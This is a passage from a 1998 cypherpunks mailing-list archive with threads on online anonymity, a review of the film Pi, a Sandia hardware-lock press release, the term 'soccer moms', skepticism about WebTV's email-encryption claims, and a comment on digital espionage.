pass your wrist over the scanner to make sure your embedded personal chip
has the matching security code. Thank you; you may now move along. We know
you have a choice when you dine out; thank you for patronizing Burger
World.


    #   #   #

A full transcript of the "smart card online forum" session referred to at
the beginning of this essay, as well as a biography and smart card white
paper from each chat participant, can be accessed at
http://www.golinharris.com/mastercard.

Subscriptions to The McAlvany Intelligence Advisor ("in no way involved in
the tax resistance, militia, or sovereign citizens movements in the U.S.")
run a substantial $115 per year. Send subscription info to P.O. Box 84904,
Phoenix, Ariz. 85071, or telephone 800-528-0559.


Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com. Vin's
twice-weekly newspaper column, "The Libertarian," is syndicated in the
United States and Canada via Mountain Media Syndications, P.O. Box 4422,
Las Vegas Nev. 89127. Watch for Vin's book, "Send in the Waco Killers,"
coming from Huntington Press in early 1999.

***



Vin Suprynowicz,   vin@lvrj.com

Education rears disciples, imitators, and routinists, not pioneers of
new ideas and creative geniuses.  The schools are not nurseries of
progress and improvement, but conservatories of tradition and unvarying
modes of thought. -- Ludwig von Mises

The most difficult struggle of all is the one within ourselves. Let us not
get accustomed and adjusted to these conditions. The one who adjusts ceases
to discriminate between good and evil.  He becomes a slave in body and
soul. Whatever may happen to you, remember always: Don't adjust! Revolt
against the reality! -- Mordechai Anielewicz, Warsaw, 1943

* * *

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Oct 1998 20:12:03 +0800
To: cypherpunks@cyberpass.net
Subject: Re: TCQ ascii version
Message-ID: <v0401171bb248ea44c0b7@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Authentication-Warning: tarnhelm.blu.org: majordom set sender to
owner-isig@blu.org using -f
Date: Tue, 13 Oct 1998 03:08:01 -0400 (EDT)
From: Charles Demas <demas@tiac.net>
To: isig@blu.org
Subject: Re: TCQ ascii version
MIME-Version: 1.0
Sender: owner-isig@blu.org
Precedence: bulk
Reply-To: isig@blu.org

On Tue, 13 Oct 1998, David Meyer wrote:

> You are not the person who posted the original message, but I'll extend my
> request to you: provide some reasonable, legitimate, requirement for
> anonymity.

How about a government employee taking part in political discussion
without the fear of suffering some form of reprisal by their elected
superiors?

How about a gay person that's still in the closet that wants to discuss
how to explain their situation to their family without the fear that
their sexual preference would be exposed?

How about those that are HIV positive looking for support while living in
a small town that is very afraid of those with HIV, and where the
knowledge that one is HIV positive has driven people from the community?

How about someone that feels they may be getting sexually harassed but
isn't sure that they want to confront their harasser, but wants some
advice?

How about a rape, incest, or domestic violence victim that is looking for
some support group but doesn't want to go public yet?

How about the alcoholic, drug user, gambler trying to come to terms with
their problem.  How about the relatives of those with that type of
problem that are looking for a private way to deal/handle the problems
associated with their relative's problem?

How about the runaway that is looking for a way to go home, or the
suicidal person that is looking for help.  Must they go public to
get that help, or should they be able to ask questions anonymously?

How about the person that wants to turn in someone that's going to
commit a crime?

There are lots of good reasons that people want privacy and anonymity,
and lots of them have to do with the prejudices of others about the
issue that the person wants to keep private.


Chuck Demas
Needham, Mass.


> I can think of one reason to treasure anonymity: fear of retribution.
> For what? Oh, anything. Doesn't matter what. You are planning to do
> something that will cause someone else to take notice of you and respond
> in a way you fear. Send you to jail? Fire you? Break your fingers? Close
> your internet access? The problem is that these things are seldom done
> on a whim. Mostly, for just cause. Who says it is just? You do. You say
> "I am about to do something that's going to bring heaven and earth down
> around my shoulders if I do not protect my identity." This fear may be
> real or imagined.
>
> Please explain, with some detail, what reason a sane, guiltless person
> might have for anonymity. Giving away $million$?
>
> --
> To unsubscribe from this list, send mail to majordomo@blu.org
> with the following text in the *body* (*not* the subject line) of the letter:
> unsubscribe isig
>

  Eat Healthy    |   _ _   | Nothing would be done at all,
  Stay Fit       |   @ @   | If a man waited to do it so well,
  Die Anyway     |    v    | That no one could find fault with it.
  demas@tiac.net |  \___/  | http://www.tiac.net/users/demas

--
To unsubscribe from this list, send mail to majordomo@blu.org
with the following text in the *body* (*not* the subject line) of the letter:
unsubscribe isig

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Oct 1998 20:23:50 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: [FP] Boiling the frog: Much will depend on 'electronicmoney'
Message-ID: <v0401171eb248efca0d22@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



> Below, please find the canonical anti-book-entry settlement privacy rant,
>written by one of my favorite ranters in general, Vin Suprynowicz.

...which, of course, we've seen already.

Sheesh.

Sorry about that, folks. Call it mail-buffer overload, or something. :-).

Sometimes it's not the the cross-fire, it's the ricochets which get you.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Walter Burton <wburton@pipestream.com>
Date: Tue, 13 Oct 1998 20:35:57 +0800
To: cypherpunks@toad.com
Subject: _PI_ movie
Message-ID: <013D438ED22ED2119F630060082F763C08A75F@kenny.pipestream.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

My wife and I went and saw the movie _PI_ this past weekend.  I was
attracted to it 'cause of the subject matter.  One reviewer wrote that
the protagonist was a "tortured genius steeped in an intriguing blend
of advanced mathematics and mystical Jewish cabala."

I suspect a fair number of cypherpunks' curiosity would be piqued by
such a description.  Well, don't waste the 5 bucks.  It's
self-indulgent, pretentious, second-year-film-student crap.  It's
whiny, "woe-is-me-tortured-genius" drivel.  It's
"squinty-cinematography-for-the-sake-of-squinty-cinematography"
effluvium.  

Here's the plot, in a nutshell:

1. Ah, I understand advanced mathematics SO WELL; I see patterns
EVERYwhere!  But alas, I cannot enjoy life's pleasures because I am,
de rigueur, a TORTURED GENIUS!

2. And my mentor USED to be a TORTURED GENIUS, but he stopped studying
THE PROFOUND MYSTERIES, and now he's happy and FUN!  What a WUSS!

[Oh yeah, and I suffer REALLY bad migraines.]

3. Isn't PI cool?

4. Aren't Fibonacci numbers neat?

5. Whaddya suppose The Holy Unspeakable Name of God is?

6. Oh, easy, it's 9049348384737...[insert 198 digits here]...32343.

7. I RUSH to tell my mentor what I've discovered, but, alas, my
ruthless taunting prompted him to re-open his investigation of THE
PROFOUND MYSTERIES and he couldn't hack it -- his brain overloaded and
he died of a stroke.  Damn!

8. So I dramatically BURN all my PROFOUND MYSTERIES conclusions and
the director inserts the requisite "shocking scene everyone will be
talking about" by having me lobotomize myself with an electric drill.

9. Next, I'm sitting on a park bench, playing games with a child
(Quintessential Innocence).  I am finally ENJOYING LIFE, appreciating
the leaves on the trees and such.  But this kid, she wants to play
math games with me, which of course symbolizes the fact that IT'S NOT
OVER!

10. The end.

And it's all shot on shitty stock in crackly black and white.  So
basically, it's about two gay cowboys and some pudding.


\\/alter
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>
Comment: For my public key, send a msg with "public key" in the subj.

iQA/AwUBNiM/4I0Llo1Bf1gWEQJmsQCfXb10feuUz/N/Jn5zxkFqymmS+gQAoI/8
4QQzJGO4rtATMDQ7zbfm0I8P
=kw8W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Oct 1998 21:18:48 +0800
To: cryptography@c2.net
Subject: "It's a Hardware Problem..."
Message-ID: <v04011720b248f21a987e@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Tue, 13 Oct 1998 06:33:46 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Sandia Labs: Foiling Hackers: World's Smallest Combination Lock
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  EurekAlert!
http://www.eurekalert.org/releases/snl-wsclpt.html

EMBARGOED FOR RELEASE: 12 OCTOBER 1998 AT 02:00:00 ET US

 Contact: Chris Burroughs
 coburro@sandia.go
 505-844-0948
 Sandia National Laboratories

 "World's Smallest Combination Lock" Promises
 To Foil The Best Computer Hacker, Say Sandia
 Developers

ALBUQUERQUE, N.M. -- The "world's smallest combination lock," a minuscule
mechanical device developed at Sandia National Laboratories, promises to
build a virtually impenetrable computer firewall that even the best hacker
can't beat. The Recodable Locking Device, which uses microelectromechanical
system (MEMS) technology so small that it takes a microscope to see it, is
a series of tiny notched gears that move to the unlocked position only when
the right code is entered. It's the first known mechanical hardware
designed to keep unwanted guests from breaking codes and illegally entering
computer and other secure systems.

"Computer firewalls have always been dependent on software, which means
they are 'soft' and subject to manipulations," says Larry Dalton, manager
of Sandia's High Integrity Software Systems Engineering Department. "Our
device is hardware and is extremely difficult to break into. You have one
and only one chance in a million of picking exactly the right code compared
to a one in 10,000 chance, with many additional chances, in most software
firewalls. After one failed try, this new device mechanically shuts down
and can't be reset and reopened except by the owner."

Patent filed

Sandia, a Department of Energy (DOE) national security lab, recently filed
for a patent for the mechanism. The first working units were fabricated in
July. The Sandia team, which is refining the device and doing reliability
tests, expects to have it ready for commercialization in about two years.
Once it is perfected, a commercial partner will be tapped to produce and
sell it. "The Recodable Locking Device should be of great interest to
businesses and individuals who have computer networks, have sites on the
Web, or require secure computers," says Frank Peter, engineer who designed
the device. "It would make it virtually impossible for break-ins to Web
sites, like what occurred with The New York Times in September." (Hackers
broke into the Times' electronic edition in mid-September and shut it down
for several hours.)

Computer crime is a growing problem nationwide. The Computer Security
Institute together with the Federal Bureau of Investigation (FBI) recently
surveyed 520 security practitioners in US corporations, government
agencies, financial institutions, and universities. Results showed that 64
percent of the respondents reported computer security breaches within the
last 12 months. And although 72 percent said they suffered financial losses
from these breaches, only 42 percent were able to quantify their losses --
estimating them to be more than $136.8 million.

Dalton says he 'had the notion' of the device for three years, calling it
the 'digital isolation and incompatibility' project. Digital was for the
digital world, and isolation and incompatibility are important concepts in
stronglinks, which are mechanical locks used as safety devices in weapons.
He turned to Sandia's Electromechanical Engineering Department, headed by
David Plummer, to do the design because of that group's expertise in
stronglinks as well as its ability to design using the new MEMS technology.

Simple system

"It took about three months to go from concept to the final design," Peter
says. "Based on a code storage scheme used successfully in existing weapon
surety subsystems, we were able to design a very simple device -- and it's
the simplicity of the device that makes it easy to analyze from a
vulnerability standpoint."

The Sandia Microelectronics Development Laboratory used Peter's design to
build a working device, which consists of a series of six code wheels, each
less than 300 microns in diameter, driven by electrostatic comb drives that
turn electrical impulses into mechanical motion. The 'lock owner' sets a
lock combination to any value from one to one million. The entire device is
about 9.4 millimeters by 4.7 millimeters, about the size of a button on a
dress shirt. The Recodable Locking Device consists of two sides -- the user
side and the secure side. To unlock the device, a user must enter a code
that identically matches the code stored mechanically in the six code
wheels. If the user makes even one wrong entry -- and close doesn't count
-- the device mechanically 'locks up' and does not allow any further tries
until the owner resets it from the secure side.

The six gears and the comb drives would be put on a small chip that could
be incorporated into any computer, computer network, or security system.
Because the chip is built using integrated circuit fabricating techniques,
hundreds can be constructed on a single six-inch silicon wafer. The end
result is that the device will be very inexpensive to produce.

Plummer says Sandia is the only place where development of such a mechanism
could have occurred. "That's due to the unique multilevel polysilicon
fabrication process developed by Sandia and our heritage of designing
mechanical locking devices," he says. Besides being a deterrent to hackers,
the device has other security applications, Peter says. For example,
controlled information could be made available only in a window of
opportunity. The information owner could tell the party needing the data
that he or she has five minutes to enter in a specific code and gain
access. Then, after five minutes, the code would be reset and access denied.

A variety of potential safety applications are also possible with the
Recodable Locking Device. The mechanism can confirm that a critical system
is operating as expected. And if it detects a problem, it will not permit
execution of a function. In this safety capacity, the device could be used,
for example, to ensure that a radiation therapy machine delivers the
correct radiation dosage. "This device has a powerful potential -- one that
is readily understood by most everyone," Dalton says. "I've been told by
Department of Defense people that this is the first real technical
advancement in information security that they've seen in a long time."

Sandia is a multiprogram DOE laboratory, operated by a subsidiary of
Lockheed Martin Corp. With main facilities in Albuquerque, N.M., and
Livermore, Calif., Sandia has major research and development
responsibilities in national security, energy, and environmental
technologies and economic competitiveness.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Tue, 13 Oct 1998 21:56:11 +0800
To: cypherpunks@cyberpass.net
Subject: Soccer Moms?
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F84C8@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



In the middle of an interesting article about digital cash, forwarded
here by Bob Hettinga, there was the line:

> After all, the kind of soccer moms who elected Bill Clinton

"Divided by a common language" as I am  I genuinly don't know what that
means. And I can't even guess from context. I'd have expected a dig at
liberals or feminists or welfare recipients at that point; and I can't
work out what soccer has to do with it.

Do mothers play soccer much in the USA?

Football (as the 95% of the world's population that aren't either
English-speaking North Americans or else Rugby fans call the Beautiful
Game) is associated in my mind with young men, specifically working
class men. It's connotations are entirely macho, even violent.  When a
big match is on men gather in pubs and bars and shout at TVs whilst
knocking back the lager. You avoid the centre of town if you don't want
to risk getting involved in a fight.  People get *killed* at football
matches.  That's pretty much true in every big city inthe world outside
North America (and Japan where the fans are polite). 

This honestly isn't a troll - I am in fact bewildered by the phrase.  

Ken Brown




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 13 Oct 1998 23:55:16 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Soccer Moms?
Message-ID: <362371A1.4AE44412@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Ken Brown wonders about this phrase:
>> After all, the kind of soccer moms who elected Bill Clinton

>"Divided by a common language" as I am  I genuinly don't know what that
>means. And I can't even guess from context.

"Soccer moms" are the suburban mothers who efficiently perform any
number of child-rearing tasks, including taking their kids in a
sports utility vehicle (an awful invention) to soccer practice.
Soccer is increasingly popular and available to girls as well as
boys.  Women in general favored Clinton, and soccer moms in
particular are the women most likely to vote... since they're doing
everything else, working in a trip to the polls is nothing to them.

Probably sounds as arcane as "Sloane Rangers" does over here, eh?

-- 
	Jim Gillogly
	Sterday, 22 Winterfilth S.R. 1998, 15:20
	12.19.5.10.15, 6 Men 8 Yax, Eighth Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Oct 1998 00:22:41 +0800
To: "Brown, R Ken" <cypherpunks@cyberpass.net
Subject: Re: Soccer Moms?
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F84C8@MSX11002>
Message-ID: <v03130305b24926e40bb9@[209.66.100.146]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:28 AM -0700 10/13/98, Brown, R Ken wrote:
>In the middle of an interesting article about digital cash, forwarded
>here by Bob Hettinga, there was the line:
>
>> After all, the kind of soccer moms who elected Bill Clinton
>
>"Divided by a common language" as I am  I genuinly don't know what that
>means. And I can't even guess from context. I'd have expected a dig at
>liberals or feminists or welfare recipients at that point; and I can't
>work out what soccer has to do with it.
>
>Do mothers play soccer much in the USA?
>
>Football (as the 95% of the world's population that aren't either
>English-speaking North Americans or else Rugby fans call the Beautiful
>Game) is associated in my mind with young men, specifically working
>class men. It's connotations are entirely macho, even violent.  When a
>big match is on men gather in pubs and bars and shout at TVs whilst
>knocking back the lager. You avoid the centre of town if you don't want
>to risk getting involved in a fight.  People get *killed* at football
>matches.  That's pretty much true in every big city inthe world outside
>North America (and Japan where the fans are polite).

Theory 1: "Soccer moms" gather everyday to practice killing each other with
broken bottles.

Theory 2: Soccer (=football, outside the U.S.) has become a popular after
school thing for girls and boys. More so than other sports. Mothers who
don't work assume the role of ferrying the children to and from practice
and games, watching them as they practice, etc. More common in affluent
suburbs.

The term "soccer mom" seems to have arisen in about 1992, as in the
sentence: "In affluent Connecticut, soccer moms form the base of
Presidential hopeful Bill Clinton's support."

--Tim May


Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xenophon@serv.net
Date: Wed, 14 Oct 1998 00:33:38 +0800
To: Walter Burton <wburton@pipestream.com>
Subject: Re: _PI_ movie
In-Reply-To: <013D438ED22ED2119F630060082F763C08A781@kenny.pipestream.com>
Message-ID: <3623084C.FD708978@serv.net>
MIME-Version: 1.0
Content-Type: text/plain


I agree that there were one too many "tortured genius
staring in the mirror while flooded by angst" scenes. Okay, perhaps two
or three too many. That having been said, I found the themes interesting.
Maybe I am sophomoric, but I will always find the fibonacci constant facsinating.
I was impressed that the director did not overstep the bounds of his understanding
of it and Kabbalah. Many directors who broach either topic have a tendency
to take what little they know and extrapolate off into meaninglessness.
Also, I liked the soundtrack, and the scene where the protaganist 
is "saved" by the group of Hasids. (Were they in an Aries K car? I found
that scene hilarious.)

Yes, it was pretentious in parts; but given the topics
this film concerned itself with, that was inevitable. And I would watch
the film 3.1416...times a day for a week before I would watch any
of the current slew of politcally correct propaganda pretending to be art
that gets pumped out by Hollywood. I venture to guess that there was more
to think about in Pi then there was in "One True Thing" or will be in "Beloved."
42,396. Er...no. 42,489. Um, wait. 23,777. yeah that's it.Xenophon

P.S. Has anyone seen the 2nd edition of "Maximum Security" yet? Any
reviews?
 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Oct 1998 22:01:11 +0800
To: cypherpunks@cyberpass.net
Subject: Re: FYI: More on WebTV security
Message-ID: <v04011722b24904a8f519@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: dstoler@gptmail.globalpac.com
Mime-Version: 1.0
Date: Tue, 13 Oct 1998 05:38:59 -0700
To: Pablo Calamera <pablo@microsoft.com>, rah@shipwright.com,
        mac-crypto@vmeng.com
From: dstoler@globalpac.com (dstoler)
Subject: Re: FYI: More on WebTV security
Cc: jimg@mentat.com

Dear all,

This message discusses Microsoft's recent press release where they announce
unlimited 128 bit RC4 export approval for WebTV users in Japan and the UK
with no key escrow. They announce secure email between WebTV users in
addition to security for financial services, web shopping, etc.

http://www.microsoft.com/presspass/press/1998/Oct98/EncryptionPR.htm (See
the end of this message for key paragraphs of the press release.)

I rarely post messages on the crypto mailing lists. I am sufficiently
disturbed by Microsoft's recent WebTV press release that I feel compelled
to comment.

The press release implies that there is secure end-to-end email between two
WebTV customers.

Perhaps I am overly cynical, but I am guessing that they are using SSL
(TLS) from a web based email application on the client to WebTV's servers.
I presume email data is decrypted at the servers, then re-encrypted to the
recipient when she uses the WebTV client to read email.

This approach would allow access to private email at the servers by WebTV
employees or law enforcement agencies.

Note the careful use of the phrases "unauthorized party" and "without
posing undo risks to national security and law enforcement" in the press
release.

I believe that WebTV's email security is directly coupled to their ability
to establish and enforce good security policy within their operation and
the trustworthiness of the employees who have access to sensitive data.

I am concerned that carefully constructed wording of Microsoft's press
release implies stronger email security than really exists. I hope I am
wrong.

David Stoler


Key paragraphs from Microsoft's press release:

WebTV Networks has been granted the first export license to use strong
128-bit encryption for any user and any application in Japan and the United
Kingdom. So, for example, an e-mail message with personal information sent
from a WebTV subscriber in Japan to a second WebTV subscriber in Japan will
be sent securely because there is no known technology by which an
unauthorized party could intercept and decipher it.

Therefore, as part of the WebTV Network, the WebTV-based Internet terminal
(starting at under $100) is now the most secure communications device
available from a U.S. company.

"WebTV Networks' export approval is a significant step for industry and
reflects the U.S. government's commitment to promoting e-commerce abroad,"
said William Reinsch, U.S. undersecretary for export administration. "The
WebTV Network provides secure communications for its customers and partners
without posing undue risks to national security and law enforcement."

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Oct 1998 00:49:56 +0800
To: cypherpunks@cyberpass.net
Subject: New Technologies for Espionage
Message-ID: <v03130306b2492e25c19f@[209.66.100.146]>
MIME-Version: 1.0
Content-Type: text/plain



It seems that the "old technologies" are approaching their end. This guy
got caught by having too many physical contacts:

-- walking into the Soviet embassy (well-known to be under surveillance)

-- presumably using dead drops to exchange documents and money

-- relying on a physical contact with an unknown person (whom he thought to
be KGB, incorrectly)

Digital dead drops and digital cash will eventually revolutionize spying.
The digital dead drops are here now, though not the digital cash.

--Tim May


Tuesday October 13 11:49 AM EDT

Ex-U.S. Army Analyst Arrested On Spy Charges

WASHINGTON (Reuters) - A former U.S. Army intelligence analyst has been
arrested on charges of spying for Russia by allegedly passing to KGB agents
highly classified
documents from 1988 to 1991, federal law enforcement officials said Tuesday.

They said David Sheldon Boone, who worked for the military's super-secret
National Security Agency, was scheduled to appear in federal court in
Alexandria, Virginia, later
Tuesday.

According to the criminal complaint, Boone, who was arrested Saturday,
began spying in 1988 after he walked into the Soviet embassy in Washington
and volunteered his
services.

He was charged with meeting his Russian handler about four times a year
between late 1988 and when he retired from the Army in 1991. Boone
allegedly was paid more than
$60,000 for the highly sensitive, top-secret documents he gave them.

He allegedly gave the Russians documents about the capabilities and
movements of Soviet forces and about Soviet tactical nuclear weapons. He
also allegedly gave the Russians a
document based on information that the National Security Agency, which
conducts eavesdropping operations around the world, had intercepted.

Boone was arrested after he was contacted in September by an individual who
worked on behalf of the FBI, but whom he believed to be a Russian agent.
According to the
complaint, he had agreed to resume his espionage activities.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "LiveUpdate News" <update@relay2.liveupdate.com>
Date: Wed, 14 Oct 1998 00:14:23 +0800
To: cypherpunks@toad.com
Subject: Crescendo News - October 1998
Message-ID: <021932948130da8RELAY2@relay2.liveupdate.com>
MIME-Version: 1.0
Content-Type: text/plain



CRESCENDO NEWS - October 1998

Well, we're back from Internet World, and have a lot of exciting 
things to let you know about!  The foliage in Massachusetts is 
finally turning color, the air is crisp, and it's almost time to
start thinking about tuning up the snowboard.

Here are some of the items covered in this newsletter:

* Paula Cole's "I Don't Want To Wait" streams with Crescendo Forte
* Crescendo Forte featured at Fall Internet World
* Behind the scenes - how to create Crescendo Forte music
* EP Release by Crescendo Forte artist "Gigi"
* What is a "SYSX"?
* Powerful authoring tools available in our online store
* Subscribing / Unsubscribing

----------------------------------

PAULA COLE STREAMS WITH CRESCENDO FORTE

Have you visited the Crescendo Forte Showcase lately?  The latest 
addition to our growing showcase is the Crescendo Forte version of 
Paula Cole's hit single "I Don't Want To Wait". This is a historic 
event - Paula has become the first major artist *ever* to have her 
content featured using Crescendo Forte.  As the winner of the 1998 
Grammy for "Best New Artist", Cole's latest album "This Fire" has 
fostered three major singles including "I Don't Want To Wait," 
which has been pegged as the theme to the new hit TV series, 
Dawson's Creek. KizoMusic produced this incredible demo using 
Crescendo Forte to add high-quality drums, piano, and bass guitar 
to a RealAudio-encoded version of the original cut from the CD.  
You don't need anything more than a 28.8 modem and a Pentium-class 
PC to enjoy both the video and audio versions of this song. See and 
hear it for yourself at the Crescendo Forte Showcase, 
http://www.liveupdate.com/cforte/showcase.html.

----------------------------------

CRESCENDO FORTE FEATURED AT FALL INTERNET WORLD	

At the Fall Internet World conference earlier this month in New 
York City, standing-room-only crowds watched on and listened as 
RealNetworks presented the latest technology for music broadcast 
on the Internet.  Featured in their presentation was Crescendo 
Forte, playing a video clip from Paula Cole.  If you weren't able 
to make it to Internet World, you can still see and hear the 
Paula Cole clip by visiting the Crescendo Forte Showcase at
http://www.liveupdate.com/cforte/showcase.html.  

----------------------------------

BEHIND THE SCENES - HOW TO CREATE CRESCENDO FORTE MUSIC

So your band has a CD to promote and you want to make the 
highest quality presentation over the Internet?  RealSystem G2 
and Crescendo Forte together deliver a rich listening experience 
requiring very low bandwidth.  Learn how to take your existing 
music and publish it using Crescendo Forte with our new step-by-step 
production guide, available on-line at 
http://www.liveupdate.com/cforte/authoring.html.  When you're done, 
send us your files for review and we may feature your music on the 
Crescendo Forte Showcase area!

----------------------------------

CD RELEASE BY CRESCENDO FORTE ARTIST "GIGI"

If you liked what you heard from Gigi in the Crescendo Forte 
Showcase, you'll love her new 6-song CD!  Part of Crescendo Forte's 
appeal is that it allows less-well-known acts such as Gigi to get 
broad exposure.  To thank all of you for listening to her music, 
she has agreed to distribute her new CD, "Tinted Window", which 
contains full studio productions of her songs that are highlighted
on the showcase, for just $6.95 including shipping & handling.  Order 
on-line today at https://secure.liveupdate.com, and you'll receive 
the CD by mail, so that you can enjoy her music both on and off-line.

----------------------------------

WHAT IS A "SYSX"?

You have probably seen an option in the Crescendo pull-down menu 
titled "Enable SYSEX Messages", and might have wondered what the 
option means.  Crescendo PLUS supports playback of System Exclusive 
(SYSX) messages.  Ever wonder how that General MIDI song you 
downloaded automatically configures delay, reverb, distortion, and 
patch edits while it plays?  MIDI files use embedded SYSX messages
to control synthesizer settings.  Crescendo PLUS will detect and 
send these hidden SYSX messages to your synthesizer or sound card.  
Many commercially manufactured MIDI files contain SYSX messages, 
so you may not hear what the MIDI musician intended until you get 
Crescendo PLUS.  Crescendo PLUS is available for $19.95 at our 
on-line store, https://secure.liveupdate.com.  Get it now, and hear 
what you've been missing!

----------------------------------

POWERFUL AUTHORING TOOLS AVAILABLE IN CRESCENDO ONLINE STORE

With the right tools, you can be a Crescendo composer.  The 
Crescendo PLUS Roland Edition for Windows 95/98 has everything 
you need to create and play great music on the Internet.  Here's 
what you get:

*Cakewalk Express 
    - record, edit, mix, and publish your own MIDI files
*Do Re Mix 
    - drag and drop ready-made musical parts to create instant songs 
*Crescendo PLUS for Internet Explorer and Netscape 
    - play streaming music over the Internet
*Virtual Sound Canvas software synthesizer 
    - Orlando's wavetable instrument sounds for your PC
*Plus over 100 ready-made MIDI song files to use in your productions

The Crescendo PLUS Roland Edition, with all of the above, is 
available for $65, including shipping and handling!  Visit 
http://www.liveupdate.com/soundcanvas.html for more details, 
or to order now.

----------------------------------

SUBSCRIBING / UNSUBSCRIBING

You're receiving this email because you downloaded Crescendo in the 
past, and we want to keep you up to date with some of the exciting 
things that are happening at LiveUpdate.  We hope you are enjoying 
Crescendo!

Note: Messages from LiveUpdate to this list will not be sent any 
more frequently than once a month, and your information has not, and 
will not, be given to others or sold.  If you wish to unsubscribe 
from this list, or if this message has been forwarded to you by a 
friend and you would like to subscribe to our newsletter, please 
send a message to newsletter@liveupdate.com.

*******************************************

Spread the Music!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Walter Burton <wburton@pipestream.com>
Date: Tue, 13 Oct 1998 22:32:39 +0800
To: cypherpunks@toad.com
Subject: _PI_ movie
Message-ID: <013D438ED22ED2119F630060082F763C08A781@kenny.pipestream.com>
MIME-Version: 1.0
Content-Type: text/plain



